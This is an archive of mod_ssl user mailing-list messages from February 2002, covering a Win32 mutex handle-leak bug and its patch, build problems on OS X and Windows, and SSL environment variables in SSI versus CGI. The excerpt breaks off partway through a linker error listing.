modssl-bugdb@modssl.org Subject: Re: [BugDB] Resource on win2000 (PR#657) References: <200202011429.PAA00814@opensource.ee.ethz.ch> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Patrick Mayweg X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Ralf, the call is CloseHandle(HANDLE toBeClosed); Regards, Patrick modssl-bugdb@modssl.org wrote: > On Wed, Jan 09, 2002, modssl-bugdb@modssl.org wrote: > > > Full_Name: Zheng XiangYang > > Version: 2.8.5 > > OS: win2000 > > Submission from: (NULL) (211.155.22.200) > > > > the mutex handles "lock_cs[i]" "in ssl_util_thread_setup" are not closed when > > the module is unloaded. Each time the child dies, more handles are opened (can > > see from task manager) > > Ok, but can anybody of the Win32 folks give me the prototype of the > DestroyMutex (or whatever it is called) function we had to call? I've no > Win32 development environment available to figure this out myself... > > Ralf S. Engelschall > rse@engelschall.com > www.engelschall.com > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 1 17:07:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA06055; Fri, 1 Feb 2002 17:06:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id RAA05987; Fri, 1 Feb 2002 17:05:12 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 85F374CE73B; Fri, 1 Feb 2002 17:05:11 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g11G4sb21616; Fri, 1 Feb 2002 17:04:54 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id QAA05408; Fri, 1 Feb 2002 16:57:57 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id QAA16496 for ; Fri, 1 Feb 2002 16:57:50 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma016408; Fri, 1 Feb 02 16:57:40 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id QAA07647 for ; Fri, 1 Feb 2002 16:57:39 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id QAA27701 for ; Fri, 1 Feb 2002 16:57:37 +0100 (MET) Message-ID: <3C5ABAF1.747FA41E@bourse.ch> Date: Fri, 01 Feb 2002 16:57:37 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: To unSubscribe References: <010201c1ab1d$678d4f80$4600000a@billdesk.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > Shakeel Shaikh wrote: > > Dear sir, > > I want to unsubscribe for your mailing list please unlist > me from your mailing list. The quickest way to unsubscribe is to visit the mod_ssl website and use the form interface: http://www.modssl.org/support/ Rgds, Owen Boyle ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 1 17:07:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA06061; Fri, 1 Feb 2002 17:06:16 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id RAA05986; Fri, 1 Feb 2002 17:05:12 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 78C2B4CE6E0; Fri, 1 Feb 2002 17:05:11 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g11G4hY21610; Fri, 1 Feb 2002 17:04:43 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id PAA01650; Fri, 1 Feb 2002 15:43:09 +0100 (MET) Date: Fri, 1 Feb 2002 15:43:09 +0100 (MET) Message-Id: <200202011443.PAA01650@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: Re: [BugDB] Resource on win2000 (PR#657) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Ralf, the call is CloseHandle(HANDLE toBeClosed); Regards, Patrick modssl-bugdb@modssl.org wrote: > On Wed, Jan 09, 2002, modssl-bugdb@modssl.org wrote: > > > Full_Name: Zheng XiangYang > > Version: 2.8.5 > > OS: win2000 > > Submission from: (NULL) (211.155.22.200) > > > > the mutex handles "lock_cs[i]" "in ssl_util_thread_setup" are not closed when > > the module is unloaded. Each time the child dies, more handles are opened (can > > see from task manager) > > Ok, but can anybody of the Win32 folks give me the prototype of the > DestroyMutex (or whatever it is called) function we had to call? I've no > Win32 development environment available to figure this out myself... > > Ralf S. Engelschall > rse@engelschall.com > www.engelschall.com > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 1 17:42:21 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA07441; Fri, 1 Feb 2002 17:41:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id RAA07418; Fri, 1 Feb 2002 17:40:55 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 1DA334CE6E0; Fri, 1 Feb 2002 17:40:55 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g11GeWw22970; Fri, 1 Feb 2002 17:40:32 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id RAA06414; Fri, 1 Feb 2002 17:14:05 +0100 (MET) Date: Fri, 1 Feb 2002 17:14:05 +0100 (MET) Message-Id: <200202011614.RAA06414@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: Re: [BugDB] Resource on win2000 (PR#657) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Fri, Feb 01, 2002, Patrick Mayweg wrote: > > Ok, but can anybody of the Win32 folks give me the prototype of the > > DestroyMutex (or whatever it is called) function we had to call? I've no > > Win32 development environment available to figure this out myself... > [...] > the call is CloseHandle(HANDLE toBeClosed); Ok, then can someone check whether the following patch solves the problem? Index: mod_ssl.h =================================================================== RCS file: /e/modssl/cvs/mod_ssl/pkg.apache/src/modules/ssl/mod_ssl.h,v retrieving revision 1.139 diff -u -d -r1.139 mod_ssl.h --- mod_ssl.h 2001/05/20 09:22:49 1.139 +++ mod_ssl.h 2002/02/01 16:06:14 @@ -839,6 +839,7 @@ char *ssl_util_algotypestr(ssl_algo_t); char *ssl_util_ptxtsub(pool *, const char *, const char *, char *); void ssl_util_thread_setup(void); +void ssl_util_thread_cleanup(void); /* Vendor extension support */ #if defined(SSL_VENDOR) && defined(SSL_VENDOR_OBJS) Index: ssl_engine_init.c =================================================================== RCS file: /e/modssl/cvs/mod_ssl/pkg.apache/src/modules/ssl/ssl_engine_init.c,v retrieving revision 1.106 diff -u -d -r1.106 ssl_engine_init.c --- ssl_engine_init.c 2001/10/16 12:03:18 1.106 +++ ssl_engine_init.c 2002/02/01 16:08:26 @@ -1086,6 +1086,8 @@ EVP_cleanup(); #endif + ssl_util_thread_cleanup(); + return; } Index: ssl_util.c =================================================================== RCS file: /e/modssl/cvs/mod_ssl/pkg.apache/src/modules/ssl/ssl_util.c,v retrieving revision 1.28 diff -u -d -r1.28 ssl_util.c --- ssl_util.c 2001/01/01 10:51:27 1.28 +++ ssl_util.c 2002/02/01 16:06:06 @@ -435,3 +435,15 @@ return; } +void ssl_util_thread_cleanup(void) +{ +#ifdef WIN32 + int i; + + CRYPTO_set_locking_callback(NULL); + for (i = 0; i < CRYPTO_NUM_LOCKS; i++) + CloseHandle(lock_cs[i]); +#endif /* WIN32 */ + return; +} + Ralf S. Engelschall rse@engelschall.com www.engelschall.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 1 17:56:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA08371; Fri, 1 Feb 2002 17:55:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id RAA08332; Fri, 1 Feb 2002 17:54:29 +0100 (MET) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Fri, 1 Feb 2002 08:54:22 -0800 Received: from 216.254.102.155 by lw11fd.law11.hotmail.msn.com with HTTP; Fri, 01 Feb 2002 16:54:22 GMT X-Originating-IP: [216.254.102.155] From: "Bab S" To: modssl-users@modssl.org Subject: Netscape gave error on SSL Date: Fri, 01 Feb 2002 16:54:22 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 01 Feb 2002 16:54:22.0758 (UTC) FILETIME=[193A9C60:01C1AB41] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bab S" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi mod_ssl users, After starting SSL "htps://servername.com",I tried on IE and netscape. With IE it works fine but with Netscape Browser version 6 it gives me an error : "Netscape and this server cannot communicate securly because they have no common Encryption Algorthims." Any help will be appreciated. Thanks _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 1 17:58:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA08447; Fri, 1 Feb 2002 17:57:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from conswfw01.con.securecomputing.com id RAA08424; Fri, 1 Feb 2002 17:56:56 +0100 (MET) Received: from conswfw01.con.securecomputing.com (root@localhost) by conswfw01.con.securecomputing.com with ESMTP id g11GueG04068 for ; Fri, 1 Feb 2002 08:56:40 -0800 (PST) Received: from conntmx01.con.securecomputing.com (conntmx01.con.securecomputing.com [192.168.24.14]) by conswfw01.con.securecomputing.com with ESMTP id g11GuY804064 for ; Fri, 1 Feb 2002 08:56:40 -0800 (PST) Received: by conntmx01.con.securecomputing.com with Internet Mail Service (5.5.2650.21) id <1CMMHL66>; Fri, 1 Feb 2002 08:56:35 -0800 Message-ID: <61F0C65933ACD311ABCC00A0C9F1AD74C4F174@conntmx01.con.securecomputing.com> From: "Melnick, Jeff" To: "'modssl-users@modssl.org'" Subject: RE: How a module can tell if a server is enabled to use SSL? Date: Fri, 1 Feb 2002 08:47:15 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C1AB40.1A7338E0" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Melnick, Jeff" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C1AB40.1A7338E0 Content-Type: text/plain; charset="iso-8859-1" I guess I should have been a bit more specific. I actually need to check if a particular virtual host is enabled to use SSL, i.e. given a server_rec, how to tell if the server that server_rec refers to is enabled to use SSL. Thanks once again. -----Original Message----- From: Melnick, Jeff [mailto:jeff_melnick@securecomputing.com] Sent: Thursday, January 31, 2002 2:20 PM To: 'modssl-users@modssl.org' Subject: How a module can tell if a server is enabled to use SSL? Does anyone know how my module (written in C), can tell if a server is enabled to use SSL? There doesn't seem to be a direct way of doing it. Thanks for the help. ------_=_NextPart_001_01C1AB40.1A7338E0 Content-Type: text/html; charset="iso-8859-1" How a module can tell if a server is enabled to use SSL?
I guess I should have been a bit more specific.
I actually need to check if a particular virtual host is enabled to use SSL, i.e. given a server_rec, how to tell if the server that server_rec refers to is enabled to use SSL.
Thanks once again.
-----Original Message-----
From: Melnick, Jeff [mailto:jeff_melnick@securecomputing.com]
Sent: Thursday, January 31, 2002 2:20 PM
To: 'modssl-users@modssl.org'
Subject: How a module can tell if a server is enabled to use SSL?

Does anyone know how my module (written in C), can tell if a server is enabled to use SSL?
There doesn't seem to be a direct way of doing it.
Thanks for the help.

------_=_NextPart_001_01C1AB40.1A7338E0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 1 18:55:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA13045; Fri, 1 Feb 2002 18:54:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from barao.cpqd.com.br id SAA12986; Fri, 1 Feb 2002 18:53:07 +0100 (MET) Received: from fw-cpqd (dmz-int.cpqd.com.br [200.231.0.35]) by barao.cpqd.com.br (8.9.3/8.9.3) with SMTP id PAA19947 for ; Fri, 1 Feb 2002 15:50:49 -0200 Received: from gandalf.cpqd.com.br ([10.202.128.110]) by fw-cpqd; Fri, 01 Feb 2002 15:52:18 -0800 (PST) Received: from mail pickup service by mailsrv1.aquarius.cpqd.com.br with Microsoft SMTPSVC; Fri, 1 Feb 2002 15:50:25 -0200 Received: from fw-cpqd ([200.231.0.66]) by mailsrv1.aquarius.cpqd.com.br with Microsoft SMTPSVC(5.0.2195.3779); Fri, 1 Feb 2002 10:15:56 -0200 Received: from conde.cpqd.com.br ([200.231.0.49]) by fw-cpqd; Fri, 01 Feb 2002 10:15:57 -0800 (PST) Received: from mmx.engelschall.com (mmx.engelschall.com [195.27.130.252]) by conde.cpqd.com.br (8.9.3/8.9.3) with ESMTP id KAA25952 for ; Fri, 1 Feb 2002 10:14:22 -0200 Received: by mmx.engelschall.com (Postfix/smtpfeed 1.16) id 1C1671938D; Fri, 1 Feb 2002 13:14:06 +0100 (CET) Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153]) by mmx.engelschall.com (Postfix) with ESMTP id E152A19345 for ; Fri, 1 Feb 2002 13:14:05 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA24396; Fri, 1 Feb 2002 13:13:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail3.bigmailbox.com id NAA24392; Fri, 1 Feb 2002 13:12:59 +0100 (MET) Received: (from www@localhost) by mail3.bigmailbox.com (8.10.0/8.10.0) id g11CCog13983; Fri, 1 Feb 2002 04:12:50 -0800 Date: Fri, 1 Feb 2002 04:12:50 -0800 Message-Id: <200202011212.g11CCog13983@mail3.bigmailbox.com> Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: binary X-Mailer: MIME-tools 4.104 (Entity 4.116) Mime-Version: 1.0 X-Originating-Ip: [209.53.22.149] From: "OSX Developer" To: modssl-users@modssl.org Subject: apache-1.3.20 + OpenSSL-0.9.6c + ModSSL-2.8.4-1.3.20 X-Sender: "OSX Developer" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users X-OriginalArrivalTime: 01 Feb 2002 12:15:56.0562 (UTC) FILETIME=[338F6720:01C1AB1A] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "OSX Developer" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Well I am using OSX Server 10.1.2 I found a patch for OpenSSL-0.9.6c so it compiles and passes the 'make test' tests (before rc4test failed). Then I do the ModSSL thing to apache-1.3.20. First I get an error saying '-undefined error' (instead of '-undefined support' in the make file) must be used when -twolevel_namespace is in effect After the change to '-undefined error' that problem goes away. Then it says can't locate file for -ldbm I looked (via locate and find) for a libdbm.a and there is no such thing. What do I do know? suffer? How can I build a libdbm.a for OSX Server 10.1.2 if that's what it needs? (I made a few tweaks to apache myself ... those sould not matter, but are needed.) I found in /usr/libexec/httpd/libssl.so and tried putting it into modules/ssl. It did compile to some degree! Yet I never see the module in the module list displayed via the 'httpd -l' module list command. Nor can I seem to add mod_rewrite.o!?! I changed both Configuration and Configuration.apaci but not luck. I noticed mod_ssl puts SharedModule libssl.so and it has to make a mod_ssl.so, but I would think it should only work with an... AddModule mod_ssl.o I tried renaming mod_ssl.so to mod_ssl.o, nothing works though. I really need a libdbm.a I suppose (Apple?) or a patch the size of a small tent. ------------------------------------------------------------ WWW.COM - Where the Web Begins! http://www.www.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 2 12:39:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA04270; Sat, 2 Feb 2002 12:38:16 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail23.bigmailbox.com id MAA04256; Sat, 2 Feb 2002 12:37:39 +0100 (MET) Received: (from www@localhost) by mail23.bigmailbox.com (8.10.0/8.10.0) id g12BbW113087; Sat, 2 Feb 2002 03:37:32 -0800 Date: Sat, 2 Feb 2002 03:37:32 -0800 Message-Id: <200202021137.g12BbW113087@mail23.bigmailbox.com> Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: binary X-Mailer: MIME-tools 4.104 (Entity 4.116) Mime-Version: 1.0 X-Originating-Ip: [209.53.22.149] From: "OSX Developer" To: modssl-users@modssl.org Subject: RE: apache-1.3.20 + OpenSSL-0.9.6c + ModSSL-2.8.4-1.3.20 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "OSX Developer" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users [ORIGINAL POSTER UPDATE] >Then it says >can't locate file for -ldbm >I looked (via locate and find) for a libdbm.a and there is no such thing. I found a GNU version of this library called libgdbm.a that I was able to compile and added to the /usr/lib directory, (of OSX Server 10.1.2). Unfortunately this then collides with the SystemLib.dylib (or whatever it's called) and is just repeating symbols I therefore already have, while the undefined symbols are still not satisfied. So the -ldbm reference is likely not needed on OSX, but still I get many undefined things like _ap_*. I think these are apache functions. So why is module/ssl failing to find them? (Maybe I should resubmit my question under a new subject later.) Clearly there are problems getting 'httpsd' together on OSX Server 10.1.2!! Yet it seems the missing functions should be referencable somehow. Any ideas would help. [I'll have to hunt down the location of the undefined symbols and #include them in the module/ssl source files or something. Does that sound right or is there a library I need to link to for _ap_* functions that's missing for some reason, when I do the correct process for "OpenSSL-0.9.6c + ModSSL-2.8.4-1.3.20" to apache-1.3.20 on OSX? [Also I will try to get apache 1.3.22 for ModSSL-2.8.5-1.3.22 but the apache web site seemed down (or busy). Also I would have to refix/customize that version too, and I had noticed 1.3.23 was not compiling properly so I am unsure of 1.3.22 potential to make much of a difference/improvement in this area. I also have OpenSSL-0.9.6b compiled but it needed a manual Rhapsody reference to configure and therefore to compile, and is in therory a step backwards, but the Example from Modssl.org has this combination. (The 'b' version needed the special 'patch<' I found to pass the 'make test' on OSX properly as well.)] ------------------------------------------------------------ WWW.COM - Where the Web Begins! http://www.www.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 2 13:43:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA06635; Sat, 2 Feb 2002 13:42:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from copper.caltel.com id NAA06621; Sat, 2 Feb 2002 13:41:49 +0100 (MET) Received: from lbn ([12.36.116.225]) by copper.caltel.com (Post.Office MTA v3.1.2 release (PO203-101c) ID# 0-68643U3500L350S0V35) with ESMTP id AAA29831; Sat, 2 Feb 2002 04:41:41 -0800 Message-Id: <4.2.2.20020202044627.00ae64a0@mail.got.net> X-Sender: lbaschy@mail.got.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Sat, 02 Feb 2002 04:57:42 -0800 To: modssl-users@modssl.org From: Leo Baschy Subject: Re: modssl/apache2 compile problems In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Leo Baschy X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Sounds similar to my problem building that under Windows. Using cygwin. Using the Visual C++ dsw/dsp projects. Rest of Apache 2.0.28 builds fine. Have put in openssl etc. (Previously on same machine have successfully built 1.3.20 with mod_ssl, still do.) The problem is specific to lex, specifically flex, processing lex.ssl_expr_yy.c(1753) : error C2143: syntax error : missing ')' before 'constant' That seems to indicate there is a file ssl_expr_scan.l which is being used to generate ssl_expr_scan.c and that generation doesn't work right. The .c file fails to compile. A temporary workaround seems to be to skip lex/flex use the ssl_expr_scan.c file that comes with 2.0.28, but I have no idea whether that might actually be an (older) incorrect version then. Anyone willing to tinker with (or knowledgable about) versions of lex? Can ssl_expr_scan.l be fine tuned to make this work again? - Leo Baschy At 06:02 PM 1/31/02 -0500, Ed Wong wrote: >Generating Code... > link.exe @C:\DOCUME~1\edwon\LOCALS~1\Temp\nmb02172. > Creating library .\Debug\mod_ssl.lib and object .\Debug\mod_ssl.exp >ssl_expr.obj : error LNK2001: unresolved external symbol _ssl_expr_yyparse >ssl_expr_scan.obj : error LNK2001: unresolved external symbol >_ssl_expr_yylval ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 2 22:49:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA29220; Sat, 2 Feb 2002 22:48:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web9402.mail.yahoo.com id WAA29188; Sat, 2 Feb 2002 22:47:42 +0100 (MET) Message-ID: <20020202214740.52612.qmail@web9402.mail.yahoo.com> Received: from [138.26.80.42] by web9402.mail.yahoo.com via HTTP; Sat, 02 Feb 2002 13:47:40 PST Date: Sat, 2 Feb 2002 13:47:40 -0800 (PST) From: suchit mishra Subject: installing & configuring SSL on Apache 1.3.22 on Windows NT To: modssl-users@modssl.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: suchit mishra X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi!! all Can any one please help me with step by step installation procedure for correctly configuring SSL on Apache web server 1.3.22 running on Windows NT 4 server SP 6? I have searched a lot on google but can't find any reliable and thorough tutorial to achieve this. Thanks Suchit __________________________________________________ Do You Yahoo!? Great stuff seeking new owners in Yahoo! Auctions! http://auctions.yahoo.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Feb 3 09:59:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA26138; Sun, 3 Feb 2002 09:58:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA26122; Sun, 3 Feb 2002 09:57:22 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 359704CE74E; Sun, 3 Feb 2002 09:57:21 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g138W7311844; Sun, 3 Feb 2002 09:32:07 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from leeor.math.technion.ac.il id XAA29773; Sat, 2 Feb 2002 23:02:52 +0100 (MET) Received: from localhost (rl@localhost) by leeor.math.technion.ac.il (8.9.3/8.9.3) with ESMTP id AAA05730; Sun, 3 Feb 2002 00:02:12 +0200 (IST) Date: Sun, 3 Feb 2002 00:02:12 +0200 (IST) From: "Zvi Har'El" To: Apache Developer List Cc: Subject: SSI vs CGI Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Zvi Har'El" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Friends, I compared the environment variables I get in an SSI, like , and a CGI, running a script like #!/usr/local/bin/zsh -x echo "Content-type: text/plain" echo printenv In an HTTPS virtual host, there are many variables that are exported one method and not the other: More specifically, all the variables starting with SSL_ (e.g., SSL_CIPHER, SSL_SESSION_ID, etc.), are exported to the CGI script, but are not printed by the printenv SSI. This is in Apache/2.0.32-dev (Unix) mod_ssl/3.0a0 OpenSSL/0.9.6b (which I compiled from the latest CVS). I didn't notice an opposite problem in this version of Apache, but in another version - in the latest RedHat distro, which is Apache 1.3.22. I didn't see the problem in 1.3.23 in Solaris: The variable assignment HTTPS=on, which appears in a HTTPS virtual host in the output, is not exported to the CGI script! (The SSL_ variables are not exported in 1.3). I didn't try to install vanilla 1.3.23 on RedHat, ao I don't know what is the origin of the problem. If I have more specific info I'll post it. Best, Zvi. -- Dr. Zvi Har'El mailto:rl@math.technion.ac.il Department of Mathematics tel:+972-54-227607 Technion - Israel Institute of Technology fax:+972-4-8324654 http://www.math.technion.ac.il/~rl/ Haifa 32000, ISRAEL "If you can't say somethin' nice, don't say nothin' at all." -- Thumper (1942) Saturday, 21 Shevat 5762, 2 February 2002, 11:37PM ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 4 09:07:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA22828; Mon, 4 Feb 2002 09:06:30 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail14.bigmailbox.com id JAA22793; Mon, 4 Feb 2002 09:05:51 +0100 (MET) Received: (from www@localhost) by mail14.bigmailbox.com (8.10.0/8.10.0) id g1485ix18073; Mon, 4 Feb 2002 00:05:44 -0800 Date: Mon, 4 Feb 2002 00:05:44 -0800 Message-Id: <200202040805.g1485ix18073@mail14.bigmailbox.com> Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: binary X-Mailer: MIME-tools 4.104 (Entity 4.116) Mime-Version: 1.0 X-Originating-Ip: [209.53.22.149] From: "OSX Developer" To: modssl-users@modssl.org Subject: compiling ERROR apache 1.3.22 with modssl 2.8.5 or 2.8.4_1.3.20 (On OSX) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "OSX Developer" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users [This is related to Apple's OSX Server 10.1.2 operating system (look out for webperfcache), and compiling Apache_1.3.22 with OpenSSL-0.9.6c via mod_ssl-2.8.5-1.3.22 or similarly with mod_ssl-2.8.4-1.3.20 the same problems exist!] First off, the compiling fails with a message saying to use 'undefined error' instead of 'undefined suppress' (in the modules/ssl/Makefile) when using a "two level name space". More import is this critical error ... cc -L/usr/local/ssl/lib -bundle -undefined error -o libssl.so mod_ssl.lo ssl_engine_config.lo ssl_engine_compat.lo ssl_engine_ds.lo ssl_engine_dh.lo ssl_engine_init.lo ssl_engine_kernel.lo ssl_engine_rand.lo ssl_engine_io.lo ssl_engine_log.lo ssl_engine_mutex.lo ssl_engine_pphrase.lo ssl_engine_vars.lo ssl_engine_ext.lo ssl_scache.lo ssl_scache_dbm.lo ssl_scache_shmht.lo ssl_scache_shmcb.lo ssl_expr.lo ssl_expr_scan.lo ssl_expr_parse.lo ssl_expr_eval.lo ssl_util.lo ssl_util_ssl.lo ssl_util_sdbm.lo ssl_util_table.lo -lssl -lcrypto /usr/bin/ld: Undefined symbols: _ap_add_config_define _ap_append_arrays _ap_check_cmd_context _ap_ctx_get _ap_ctx_set _ap_getword_conf _ap_global_ctx _ap_make_array _ap_make_sub_pool 